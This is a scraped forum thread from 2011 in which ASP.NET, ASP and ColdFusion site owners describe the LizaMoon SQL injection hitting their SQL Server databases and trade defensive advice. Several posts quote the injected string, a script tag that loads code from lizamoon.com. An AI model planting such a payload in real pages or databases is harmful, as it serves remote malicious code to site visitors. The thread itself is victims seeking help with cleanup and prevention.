My database was inserted a string like "</title><script src=http://lizamoon.com/ur.php></script>". Event the username field in aspnet_users table. So now I can't login my website if I use asp.net security. Who know about this problem please tell me what
happening with my database or my website. And how can I fix it ? Thanks all!
KheoMua.Com - Trang thông tin khuyến mại, giảm giá tổng hợp!
Email: info@kheomua.com | Website: http://www.kheomua.com
If you have disabled request validation (for example to allow certain rich text boxes to accept html input on the page) then you might have opened up a security hole which has allowed somebody to signup with spammy names?
On possible way to prevent this in future would be to put a regularexpression validator on your username textbox on the signup page.
You will need to connect to your database and manually clean out the rouge records so that you can login as well.
I would also recommend installing elmah which will log any errors occuring on the site and could give you a heads up to people attacking your site:
This appeared on my ASP site on Friday, I have removed all instances I can find of it. However, I still want to know why this has happened as I have another two ASP sites an one ASP.NET site.
The common thing between all my sites is that they use a SQL Server database.
I have also found the whois details of lizamoon.com and it comes up with rubbish, view it here:
After a bit more investigation and clearing out my database, it has only been added to fields that are either 'text' or 'nvarchar' data types.
If you do a google search for part of the script url it shows up a lot of sites that have been inffected. Alsdo have notice that one of the sites is displaying 'Alert: This Site has been hit with the Liza Moon SQL Injection Attack!'
Anyone found out how, why this has happen and anyway to stopping it happening again.
One our sql 2005 database was attacked last Friday. Only some fields ntext or varchar have been modified. We use tiny_mce for html insert by asp.net pages into sqlserver db
dtha20
Member
4 Points
6 Posts
LizaMoon actack who know about this ?
Mar 27, 2011 10:02 AM|LINK
My database was inserted a string like "</title><script src=http://lizamoon.com/ur.php></script>". Event the username field in aspnet_users table. So now I can't login my website if I use asp.net security. Who know about this problem please tell me what happening with my database or my website. And how can I fix it ? Thanks all!
Email: info@kheomua.com | Website: http://www.kheomua.com
rtpHarry
All-Star
56620 Points
8958 Posts
Re: LizaMoon actack who know about this ?
Mar 27, 2011 06:32 PM|LINK
Does your signup page have validaterequest="false" in the top of your page?
If you have disabled request validation (for example to allow certain rich text boxes to accept html input on the page) then you might have opened up a security hole which has allowed somebody to signup with spammy names?
On possible way to prevent this in future would be to put a regularexpression validator on your username textbox on the signup page.
You will need to connect to your database and manually clean out the rouge records so that you can login as well.
I would also recommend installing elmah which will log any errors occuring on the site and could give you a heads up to people attacking your site:
claudejanz
Member
4 Points
2 Posts
Re: LizaMoon actack who know about this ?
Mar 28, 2011 08:34 AM|LINK
Same problem. Did you find a solution?
claudejanz
Member
4 Points
2 Posts
Re: LizaMoon actack who know about this ?
Mar 28, 2011 08:44 AM|LINK
Hi don't think It's a signup problem. All database usernames are corupted even old one.
sylarious
Member
6 Points
3 Posts
Re: LizaMoon actack who know about this ?
Mar 28, 2011 09:26 AM|LINK
davidbradley
Member
12 Points
8 Posts
Re: LizaMoon actack who know about this ?
Mar 28, 2011 10:08 AM|LINK
Hi,
This appeared on my ASP site on Friday, I have removed all instances I can find of it. However, I still want to know why this has happened as I have another two ASP sites an one ASP.NET site.
The common thing between all my sites is that they use a SQL Server database.
I have also found the whois details of lizamoon.com and it comes up with rubbish, view it here:
whois.domaintools.com/lizamoon.com
Regards
jvitalos
Member
2 Points
1 Post
Re: LizaMoon actack who know about this ?
Mar 28, 2011 11:38 AM|LINK
Hit one of my sites as well. Written in Cold Fusion but running a SQL Server database.
Hit multiple tables and various columns in the database.
davidbradley
Member
12 Points
8 Posts
Re: LizaMoon actack who know about this ?
Mar 28, 2011 12:02 PM|LINK
After a bit more investigation and clearing out my database, it has only been added to fields that are either 'text' or 'nvarchar' data types.
If you do a google search for part of the script url it shows up a lot of sites that have been inffected. Alsdo have notice that one of the sites is displaying 'Alert: This Site has been hit with the Liza Moon SQL Injection Attack!'
Anyone found out how, why this has happen and anyway to stopping it happening again.
Thanks
Mattnation
Member
8 Points
4 Posts
Re: LizaMoon actack who know about this ?
Mar 28, 2011 12:40 PM|LINK
We've been attacked too - exactly the same symptoms - anyone figured out how they got in yet???
rrazzauti
Member
2 Points
1 Post
Re: LizaMoon actack who know about this ?
Mar 28, 2011 01:14 PM|LINK
One our sql 2005 database was attacked last Friday. Only some fields ntext or varchar have been modified. We use tiny_mce for html insert by asp.net pages into sqlserver db